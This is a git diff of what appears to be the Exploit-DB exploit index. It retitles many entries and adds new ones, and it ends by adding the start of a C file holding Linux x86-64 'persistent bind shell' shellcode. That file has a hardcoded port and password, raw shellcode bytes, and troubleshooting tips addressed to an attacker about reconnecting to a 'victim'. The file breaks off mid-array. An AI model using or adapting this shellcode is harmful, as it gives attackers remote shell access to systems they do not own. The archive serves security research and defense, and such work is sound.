 31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway 'PARAMS' Parameter Cross-Site Scripting",2008-06-26,"Erez Metula",asp,webapps,0
 31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 Malformed Playlist File Denial Of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0
 32135,platforms/php/webapps/32135.txt,"common solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting",2008-07-31,"Ghost Hacker",php,webapps,0
-32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/ 5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0
+32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0
 32047,platforms/php/webapps/32047.txt,"Hudson 1.223 - 'q' Parameter Cross-Site Scripting",2008-07-11,syniack,php,webapps,0
 32048,platforms/osx/remote/32048.html,"Apple iPhone and iPod Touch < 2.0 - Multiple Remote Vulnerabilities",2008-07-11,"Hiromitsu Takagi",osx,remote,0
 31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80
@@ -30314,7 +30314,7 @@ id,file,description,date,author,platform,type,port
 33633,platforms/windows/webapps/33633.txt,"IPSwitch IMail Server WEB client 12.4 persistent XSS",2014-06-03,Peru,windows,webapps,0
 33644,platforms/php/webapps/33644.txt,"Basic-CMS 'nav_id' Parameter Cross-Site Scripting",2010-02-12,Red-D3v1L,php,webapps,0
 33641,platforms/php/webapps/33641.txt,"Joomla! F!BB Component 1.5.96 RC SQL Injection and HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0
-33642,platforms/windows/remote/33642.html,"Symantec Multiple Products Client Proxy ActiveX (CLIproxy.dll) Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0
+33642,platforms/windows/remote/33642.html,"Symantec Multiple Products - Client Proxy ActiveX (CLIproxy.dll) Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0
 33643,platforms/php/webapps/33643.txt,"CMS Made Simple 1.6.6 - Local File Include and Cross-Site Scripting Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0
 33647,platforms/asp/webapps/33647.txt,"Portrait Software Portrait Campaign Manager 4.6.1.22 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-16,"Roel Schouten",asp,webapps,0
 33648,platforms/hardware/remote/33648.txt,"Huawei HG510 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-16,"Ivan Markovic",hardware,remote,0
@@ -31203,7 +31203,7 @@ id,file,description,date,author,platform,type,port
 34643,platforms/php/webapps/34643.txt,"Silurus Classifieds category.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0
 34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0
 34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0
-34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0
+34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) - Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0
 34647,platforms/windows/remote/34647.txt,"Ammyy Admin 3.5 - RCE",2014-09-13,scriptjunkie,windows,remote,0
 34648,platforms/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape PoC",2014-09-13,"Joxean Koret",windows,local,0
 34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 - 'login2.php' Cross-Site Scripting",2010-09-17,"Gjoko Krstic",php,webapps,0
@@ -31430,8 +31430,8 @@ id,file,description,date,author,platform,type,port
 34890,platforms/php/webapps/34890.txt,"Wiccle Web Builder 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-10-21,"Veerendra G.G",php,webapps,0
 34891,platforms/php/webapps/34891.txt,"Micro CMS 1.0 - 'name' Parameter HTML Injection",2010-10-21,"SecPod Research",php,webapps,0
 34892,platforms/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Parameter Cross-Site Scripting",2010-10-21,"Antu Sanadi",php,webapps,0
-34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0
-34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0
+34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0
+34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0
 34895,platforms/cgi/webapps/34895.rb,"Bash CGI - RCE Shellshock Exploit (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
 34896,platforms/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit (Shellshock)",2014-10-06,"Phil Blank",linux,remote,0
 34922,platforms/php/webapps/34922.txt,"Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
@@ -31479,7 +31479,7 @@ id,file,description,date,author,platform,type,port
 34943,platforms/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",windows,remote,0
 34944,platforms/php/webapps/34944.txt,"SmartOptimizer Null Character Remote Information Disclosure",2010-11-01,"Francois Harvey",php,webapps,0
 34945,platforms/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 - Directory Traversal",2010-11-01,"John Leitch",multiple,remote,0
-34946,platforms/php/webapps/34946.txt,"cformsII 11.5/ 13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0
+34946,platforms/php/webapps/34946.txt,"cformsII 11.5/13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0
 34947,platforms/php/webapps/34947.txt,"CMS WebManager-Pro 7.4.3 - Cross-Site Scripting and SQL Injection Vulnerabilities",2010-10-30,MustLive,php,webapps,0
 34948,platforms/asp/webapps/34948.txt,"Douran Portal 3.9.7.55 - Arbitrary File Upload and Cross-Site Scripting Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps,0
 34949,platforms/multiple/remote/34949.py,"BroadWorks Call Detail Record Security Bypass",2010-11-02,"Nick Freeman",multiple,remote,0
@@ -31532,7 +31532,7 @@ id,file,description,date,author,platform,type,port
 35004,platforms/php/webapps/35004.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (1)",2010-11-18,"High-Tech Bridge SA",php,webapps,0
 35005,platforms/windows/remote/35005.html,"WebKit Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",windows,remote,0
 35006,platforms/windows/remote/35006.html,"WebKit Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0
-35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0
+35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0
 35008,platforms/cgi/webapps/35008.txt,"Hot Links SQL 3.2 - 'report.cgi' SQL Injection",2010-11-22,"Aliaksandr Hartsuyeu",cgi,webapps,0
 35009,platforms/php/webapps/35009.txt,"AuraCMS 1.62 - 'pdf.php' SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0
 35010,platforms/osx/local/35010.c,"Apple iOS <= 4.0.2 - Networking Packet Filter Rules Local Privilege Escalation",2010-11-22,Apple,osx,local,0
@@ -31669,7 +31669,7 @@ id,file,description,date,author,platform,type,port
 35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection",2010-12-28,"non customers",php,webapps,0
 35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 - Cross-Site Scripting",2010-12-23,"Gjoko Krstic",multiple,remote,0
 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' Parameter SQL Injection",2010-12-27,Dr.NeT,php,webapps,0
-35146,platforms/php/webapps/35146.txt,"PHP 5.x (< 5.6.2) - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
+35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal",2010-12-24,anonymous,linux,remote,0
 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0
 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
@@ -31974,9 +31974,9 @@ id,file,description,date,author,platform,type,port
 35482,platforms/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 - 'year' Parameter Cross-Site Scripting",2011-03-21,"kurdish hackers team",php,webapps,0
 35483,platforms/php/dos/35483.txt,"PHP 5.3.x - 'Intl' Extension 'NumberFormatter::setSymbol()' Function Denial of Service",2011-03-10,thoger,php,dos,0
 35484,platforms/php/dos/35484.php,"PHP 5.3.x - 'Zip' Extension 'stream_get_contents()' Function Denial of Service",2011-03-10,paulgao,php,dos,0
-35485,platforms/php/dos/35485.php,"PHP 5.x (< 5.3.6) 'Zip' Extension - 'zip_fread()' Function Denial of Service",2011-03-10,TorokAlpar,php,dos,0
-35486,platforms/php/dos/35486.php,"PHP 5.x (< 5.3.6) OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0
-35487,platforms/php/dos/35487.php,"PHP 5.x (< 5.3.6) OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0
+35485,platforms/php/dos/35485.php,"PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Function Denial of Service",2011-03-10,TorokAlpar,php,dos,0
+35486,platforms/php/dos/35486.php,"PHP < 5.3.6 OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0
+35487,platforms/php/dos/35487.php,"PHP < 5.3.6 OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0
 35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x HFS Subsystem Information Disclosure",2011-03-21,"Dan Rosenberg",osx,local,0
 35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0
 35490,platforms/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,php,webapps,0
@@ -32306,7 +32306,7 @@ id,file,description,date,author,platform,type,port
 35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change Exploit",2015-02-05,"Todor Donev",hardware,remote,0
 35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0
 35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers PPPoE Credentials Information Disclosure",2011-07-27,securititracker,hardware,remote,0
-35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products Authenticated File Upload",2015-01-20,Metasploit,java,remote,8080
+35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products - Authenticated File Upload",2015-01-20,Metasploit,java,remote,8080
 35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80
 35847,platforms/osx/local/35847.c,"OS X networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0
 35848,platforms/osx/local/35848.c,"OS X 10.9.5 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0
@@ -32431,7 +32431,7 @@ id,file,description,date,author,platform,type,port
 35965,platforms/php/webapps/35965.txt,"Joomla! 'com_resman' Component Cross Site Scripting",2011-07-15,SOLVER,php,webapps,0
 35966,platforms/php/webapps/35966.txt,"Joomla! 'com_newssearch' Component SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0
 35967,platforms/php/webapps/35967.txt,"AJ Classifieds 'listingid' Parameter - SQL Injection",2011-07-15,Lazmania61,php,webapps,0
-35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products Multiple SQL Injection Vulnerabilities",2011-07-18,Lazmania61,php,webapps,0
+35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products - Multiple SQL Injection Vulnerabilities",2011-07-18,Lazmania61,php,webapps,0
 35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,php,webapps,0
 35970,platforms/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ Cross Site Request Forgery and HTML Injection Vulnerabilities",2011-07-18,MustLive,hardware,remote,0
 35971,platforms/php/webapps/35971.txt,"WordPress bSuite Plugin 4.0.7 - Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps,0
@@ -32573,10 +32573,10 @@ id,file,description,date,author,platform,type,port
 36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 - 'index.php' Local File Include",2011-09-15,KedAns-Dz,php,webapps,0
 36137,platforms/php/webapps/36137.txt,"PunBB <= 1.3.5 Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps,0
 36138,platforms/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 - 'id' Parameter SQL Injection",2011-09-18,m3rciL3Ss,asp,webapps,0
-36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products Multiple SQL Injection Vulnerabilities",2011-09-17,m3rciL3Ss,asp,webapps,0
+36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products - Multiple SQL Injection Vulnerabilities",2011-09-17,m3rciL3Ss,asp,webapps,0
 36140,platforms/php/webapps/36140.txt,"Toko LiteCMS 1.5.2 HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0
 36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 - 'matchword' Parameter Cross Site Scripting",2011-09-19,"kurdish hackers team",asp,webapps,0
-36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products 'dir' parameters Multiple Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0
+36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products - 'dir' parameters Multiple Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0
 36143,platforms/osx/local/36143.txt,"Apple Mac OS X Lion Directory Services Security Bypass Vulnerabilities",2011-09-19,"Defence in Depth",osx,local,0
 36144,platforms/php/webapps/36144.txt,"Card sharj 1.0 Multiple SQL Injection Vulnerabilities",2011-09-19,Net.Edit0r,php,webapps,0
 36145,platforms/windows/remote/36145.py,"IBM Lotus Domino 8.5.2 - 'NSFComputeEvaluateExt()' Function Remote Stack Buffer Overflow",2011-09-20,rmallof,windows,remote,0
@@ -33675,7 +33675,7 @@ id,file,description,date,author,platform,type,port
 37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh shellcode (2) (21 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0
 37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection",2015-06-15,"walid naceri",php,webapps,0
 37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service",2015-06-15,3unnym00n,windows,dos,0
-37293,platforms/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,linux,local,0
+37293,platforms/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,linux,local,0
 37561,platforms/multiple/dos/37561.pl,"UPNPD M-SEARCH ssdp:discover Reflection Denial of Service",2015-07-10,"Todor Donev",multiple,dos,1900
 37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 Multiple SQL Injection and Local File Include Vulnerabilities",2012-05-27,n4ss1m,php,webapps,0
 37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 Database Information Disclosure",2012-05-28,L3b-r1'z,php,webapps,0
@@ -33768,7 +33768,7 @@ id,file,description,date,author,platform,type,port
 37412,platforms/php/webapps/37412.php,"Joomla! Maian Media Component 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0
 37413,platforms/php/webapps/37413.txt,"Joomla JCal Pro Calendar Component SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0
 37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 Multiple SQL Injection Vulnerabilities",2012-06-16,JosS,php,webapps,0
-37415,platforms/php/webapps/37415.txt,"Webify Multiple Products Multiple HTML Injection and Local File Include Vulnerabilities",2012-06-16,snup,php,webapps,0
+37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection and Local File Include Vulnerabilities",2012-06-16,snup,php,webapps,0
 37416,platforms/java/webapps/37416.txt,"Squiz CMS Multiple Cross Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0
 37417,platforms/php/webapps/37417.php,"WordPress Multiple Themes 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0
 37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0
@@ -33881,7 +33881,7 @@ id,file,description,date,author,platform,type,port
 37621,platforms/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (1)",2015-07-15,"Pedro Ribeiro",windows,webapps,0
 37530,platforms/php/webapps/37530.txt,"WordPress WP e-Commerce Shop Styling Plugin 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80
 37531,platforms/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",hardware,webapps,0
-37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080
+37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products - OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080
 37533,platforms/asp/webapps/37533.txt,"Orchard CMS 1.7.3/1.8.2/1.9.0 - Stored XSS",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80
 37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow",2015-07-08,Metasploit,multiple,remote,0
 37537,platforms/php/webapps/37537.txt,"phpProfiles Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0
@@ -34025,7 +34025,7 @@ id,file,description,date,author,platform,type,port
 37692,platforms/multiple/dos/37692.pl,"aMSN Remote Denial of Service",2006-01-01,"Braulio Miguel Suarez Urquijo",multiple,dos,0
 37693,platforms/php/webapps/37693.txt,"Sitemax Maestro SQL Injection and Local File Include Vulnerabilities",2012-09-03,AkaStep,php,webapps,0
 37694,platforms/php/webapps/37694.txt,"Wiki Web Help 'configpath' Parameter Remote File Include",2012-08-04,L0n3ly-H34rT,php,webapps,0
-37695,platforms/php/webapps/37695.txt,"Sciretech Multiple Products Multiple SQL Injection Vulnerabilities",2012-09-04,AkaStep,php,webapps,0
+37695,platforms/php/webapps/37695.txt,"Sciretech Multiple Products - Multiple SQL Injection Vulnerabilities",2012-09-04,AkaStep,php,webapps,0
 37696,platforms/asp/webapps/37696.txt,"Cm3 CMS 'search.asp' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,Crim3R,asp,webapps,0
 37697,platforms/php/webapps/37697.txt,"phpFox 3.0.1 - 'ajax.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0
 37698,platforms/php/webapps/37698.txt,"Kayako Fusion 'download.php' Cross Site Scripting",2012-09-05,"High-Tech Bridge",php,webapps,0
@@ -34949,7 +34949,7 @@ id,file,description,date,author,platform,type,port
 38676,platforms/php/webapps/38676.txt,"WordPress Duplicator Plugin Cross Site Scripting",2013-07-24,"High-Tech Bridge",php,webapps,0
 38677,platforms/php/webapps/38677.txt,"VBulletin <= 4.0.2 - 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0
 38678,platforms/php/webapps/38678.txt,"WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0
-38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) Multiple Cross Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0
+38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) - Multiple Cross Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0
 38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0
 38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0
 38682,platforms/php/webapps/38682.txt,"Jahia xCM /engines/manager.jsp site Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0
@@ -35929,7 +35929,7 @@ id,file,description,date,author,platform,type,port
 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - bindshell (Port 5600) shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
 39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
-40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
+40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0
 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0
 39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP Shellcode (IPv6) (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
@@ -36270,7 +36270,7 @@ id,file,description,date,author,platform,type,port
 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Continuously-Probing Reverse Shell via Socket + Port-range + Password shellcode (172 bytes)",2016-07-11,CripSlick,lin_x86-64,shellcode,0
 40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 and 11 - Main.swf Hardcoded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0
 40107,platforms/windows/local/40107.rb,"Windows 7-10 and 2k8-2k12 x86/x64 - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0
-40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",2016-07-13,Metasploit,linux,remote,443
+40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution",2016-07-13,Metasploit,linux,remote,443
 40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple CSRF Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0
 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80
@@ -36280,3 +36280,7 @@ id,file,description,date,author,platform,type,port
 40118,platforms/windows/local/40118.txt,"Internet Explorer 11 (on Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
 40119,platforms/linux/remote/40119.md,"DropBearSSHD <= 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0
 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution and Escalate Privileges",2016-07-17,b0yd,hardware,remote,0
+40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83_ 148_ 177 bytes)",2016-07-19,CripSlick,lin_x86-64,shellcode,0
+40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit",2016-07-19,bashis,multiple,remote,0
+40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
+40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
diff --git a/platforms/lin_x86-64/shellcode/40122.txt b/platforms/lin_x86-64/shellcode/40122.txt
new file mode 100755
index 000000000..438dc3048
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/40122.txt
@@ -0,0 +1,161 @@ +#include +#include + +//| Exploit Title: [Syscall Persistent Bind Shell + (multi-terminal) + password + daemon (83, 148, 177 bytes)] +//| Date: [7/15/2016] +//| Exploit Author: [CripSlick] +//| Tested on: [Kali 2.0 x86_x64] +//| Version: [No Program Version, Only Syscalls Used] + +//| ShepherdDowling@gmail.com +//| OffSec ID: OS-20614 +//| http://50.112.22.183/ + + +//|========================================================================================= +//|=============== CripSlick's Persistent Bind-Shell with Port-Range + password ============ +//| +//| +//| CODE 3 Has everything to offer that CODE2 has and more. CODE2 has everything to offer +//| that CODE1 has and more. CODE1 is still great due to being a very short bind shell. +//| The point is that that there is really ONLY 1 shellcode here, it is just that CODE2 & +//| CODE1 have less features to cut down on byte count giving you more options. +//| +//| Troubleshooting: +//| 1. Problem: A lot of ports appeared on "nmap -p-" but not my port? +//| 1. Answer: This is common when you swap the high and low port +//| +//| 2. Problem: I disconnected and can't reconnect (even when I use the right password) +//| 2. Answer: This is common when re-executing the program (even after making changes) +//| Solve this by closing the terminal completly out, going to your directory +//| recompiling the program and then relaunching. +//| +//| If it is because you typed in the password wrong, wait about 60 seconds to +//| re-connect. No re-execution of the program is required to reconnect for +//| CODE2 & CODE3. +//| +//| 3. Problem: I DoS'd the victim +//| 3. Answer: This probably was because you set the port range too broad. A broad port range +//| takes a lot of CPU power. I suggest keeping it to how many terminals you need. 
+//| + + + +#define PORT "\x11\x5a" // FORWARD BYTE ORDER +//| PORT: 4442 +#define PASSWORD "\x6c\x61\x20\x63\x72\x69\x70\x73" // FORWARD BYTE ORDER +//| PASSWORD = "la crips" + +//| ONLY CODE3 DOES NOT USE "PORT"; IT USES "LOW_PORT" & "HIGH_PORT" +#define HIGH_PORT "\x5f\x11" // REVERSE BYTE ORDER +#define LOW_PORT "\x5b\x11" // REVERSE BYTE ORDER +//| PORTS: 4443-4447 (remember 4443 doesn't count so 4444-4447) +//| (remember to use one terminal connection per open port) + +//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!======================= +//| ========================================================================= +//| CODE1 The short bind shell (83 bytes) +//| ========================================================================= +//| This is the shortest bind-shell I could make. I leaned that mov byte takes +//| two bytes while Push+Pop takes 3 so I used more moves. Push+Pop is good if +//| you don't want to xor a register but your stack must be NULL on top. +//| This code only supports one terminal. + +unsigned char CODE1[] = //replace CODE1 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< +"\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x6a\x01\x5e\xb0\x29\x0f\x05\x48" +"\x97\x6a\x02\x66\xc7\x44\x24\x02"PORT"\x54\x5e\x52\xb2\x10\xb0\x31" 